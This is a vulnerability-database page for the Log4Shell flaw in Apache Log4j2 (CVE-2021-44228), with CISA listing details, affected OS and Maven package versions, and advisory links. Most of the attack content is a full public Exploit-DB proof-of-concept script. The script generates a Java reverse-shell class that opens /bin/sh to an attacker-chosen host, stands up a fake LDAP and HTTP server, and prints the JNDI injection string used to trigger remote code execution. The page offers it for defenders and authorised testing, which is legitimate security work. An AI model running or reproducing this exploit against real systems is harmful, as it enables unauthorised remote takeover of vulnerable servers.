CVE-2021-44228
Description
Apache Log4j2 contains a vulnerability where JNDI features do not protect against attacker-controlled JNDI-related endpoints, allowing for remote code execution.
CISA KEV
- Vendor: Apache
- Product: Log4j2
- Due date: 2021-12-24
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or, if you've already worked around this in production, publish your fix to the community-verified tier.
Propose a mitigation on Community: mitigations published via the community go through AI scoring, two human reviewers and a 7-day silent objection window before landing here with source_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
AD Manager Plus 7122 - Remote Code Execution (RCE)
Apache Log4j 2 - Remote Code Execution (RCE)
```python
# Exploit Title: Apache Log4j 2 - Remote Code Execution (RCE)
# Date: 11/12/2021
# Exploit Authors: kozmer, z9fr, svmorris
# Vendor Homepage: https://logging.apache.org/log4j/2.x/
# Software Link: https://github.com/apache/logging-log4j2
# Version: versions 2.0-beta-9 and 2.14.1.
# Tested on: Linux
# CVE: CVE-2021-44228
# Github repo: https://github.com/kozmer/log4j-shell-poc
import subprocess
import sys
import argparse
import threading
from http.server import HTTPServer, SimpleHTTPRequestHandler
from colorama import Fore, init

init(autoreset=True)


def listToString(s):
    # argparse returns each option as a list (nargs='+'); join it back into one string
    str1 = ""
    try:
        for ele in s:
            str1 += ele
        return str1
    except Exception as ex:
        parser.print_help()
        sys.exit()


def payload(userip, webport, lport):
    # Java source served to the target; host and port are filled in from the arguments
    genExploit = (
        """
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class Exploit {
    public Exploit() throws Exception {
        String host="%s";
        int port=%s;
        String cmd="/bin/sh";
        Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
        Socket s=new Socket(host,port);
        InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
        OutputStream po=p.getOutputStream(),so=s.getOutputStream();
        while(!s.isClosed()) {
            while(pi.available()>0)
                so.write(pi.read());
            while(pe.available()>0)
                so.write(pe.read());
            while(si.available()>0)
                po.write(si.read());
            so.flush();
            po.flush();
            Thread.sleep(50);
            try {
                p.exitValue();
                break;
            }
            catch (Exception e){
            }
        };
        p.destroy();
        s.close();
    }
}
""") % (userip, lport)

    # writing the exploit to Exploit.java file
    try:
        f = open("Exploit.java", "w")
        f.write(genExploit)
        f.close()
        print(Fore.GREEN + '[+] Exploit java class created success')
    except Exception as e:
        print(Fore.RED + f'[-] Something went wrong {e}')

    checkJavaAvailible()
    print(Fore.GREEN + '[+] Setting up fake LDAP server\n')

    # create the LDAP server on new thread
    t1 = threading.Thread(target=createLdapServer, args=(userip, webport))
    t1.start()

    # start the web server
    httpd = HTTPServer(('localhost', int(webport)), SimpleHTTPRequestHandler)
    httpd.serve_forever()


def checkJavaAvailible():
    # the PoC expects a bundled JDK 8 inside the repository checkout
    javaver = subprocess.call(['./jdk1.8.0_20/bin/java', '-version'],
                              stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
    if javaver != 0:
        print(Fore.RED + '[-] Java is not installed inside the repository ')
        sys.exit()


def createLdapServer(userip, lport):
    # note: the second argument receives the web port from payload(), not the netcat port
    sendme = ("${jndi:ldap://%s:1389/a}") % (userip)
    print(Fore.GREEN + "[+] Send me: " + sendme + "\n")

    subprocess.run(["./jdk1.8.0_20/bin/javac", "Exploit.java"])
    url = "http://{}:{}/#Exploit".format(userip, lport)
    subprocess.run(["./jdk1.8.0_20/bin/java", "-cp",
                    "target/marshalsec-0.0.3-SNAPSHOT-all.jar", "marshalsec.jndi.LDAPRefServer", url])


def header():
    print(Fore.BLUE + """
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
""")


if __name__ == "__main__":
    header()
    try:
        parser = argparse.ArgumentParser(description='please enter the values ')
        parser.add_argument('--userip', metavar='userip', type=str,
                            nargs='+', help='Enter IP for LDAPRefServer & Shell')
        parser.add_argument('--webport', metavar='webport', type=str,
                            nargs='+', help='listener port for HTTP port')
        parser.add_argument('--lport', metavar='lport', type=str,
                            nargs='+', help='Netcat Port')
        args = parser.parse_args()
        # print(args.userip)
        payload(listToString(args.userip), listToString(args.webport), listToString(args.lport))
    except KeyboardInterrupt:
        print(Fore.RED + "user interrupted the program.")
        sys.exit(0)
```
Apache Log4j2 2.14.1 - Information Disclosure
Metasploit modules
OS impact
SUSE: Affected, 1 release
| Version | Status | Fixed in |
|---|---|---|
| - | Affected | - |
Arch: Fixed, 1 release
| Version | Status | Fixed in |
|---|---|---|
| - | Fixed | 2.11.1-2 |
Debian: Fixed, 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 0 |
| sid | Fixed | 0 |
| forky | Fixed | 0 |
| bullseye | Fixed | 0 |
| bookworm | Fixed | 0 |
Package impact
| Ecosystem | Package | Vulnerable | Fixed |
|---|---|---|---|
| Maven | org.apache.logging.log4j:log4j-core | >=2.13.0,<2.15.0 | 2.15.0 |
| Maven | org.apache.logging.log4j:log4j-core | >=2.0-beta9,<2.3.1 | 2.3.1 |
| Maven | org.apache.logging.log4j:log4j-core | >=2.4,<2.12.2 | 2.12.2 |
| Maven | com.guicedee.services:log4j-core | <=1.2.1.2-jre17 | |
| Maven | org.xbib.elasticsearch:log4j | | |
| Maven | uk.co.nichesolutions.logging.log4j:log4j-core | | |
| Maven | org.ops4j.pax.logging:pax-logging-log4j2 | >=1.8.0,<1.9.2 | 1.9.2 |
| Maven | org.ops4j.pax.logging:pax-logging-log4j2 | >=1.10.0,<1.10.8 | 1.10.8 |
| Maven | org.ops4j.pax.logging:pax-logging-log4j2 | >=1.11.0,<1.11.10 | 1.11.10 |
| Maven | org.ops4j.pax.logging:pax-logging-log4j2 | >=2.0.0,<2.0.11 | 2.0.11 |
References
- https://security-tracker.debian.org/tracker/CVE-2021-44228
- https://www.suse.com/security/cve/CVE-2021-44228.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- https://github.com/apache/logging-log4j2/pull/608
- https://github.com/github/advisory-database/pull/5501
- https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf
- https://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html
- https://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html
- https://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html
- https://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032
- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
- https://seclists.org/fulldisclosure/2022/Dec/2
- https://seclists.org/fulldisclosure/2022/Jul/11
- https://seclists.org/fulldisclosure/2022/Mar/23
- https://security.netapp.com/advisory/ntap-20211210-0007
- https://support.apple.com/kb/HT213189
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
- https://twitter.com/kurtseifried/status/1469345530182455296
- https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-44228
- https://www.debian.org/security/2021/dsa-5020
- https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html
- https://www.kb.cert.org/vuls/id/930724
- https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html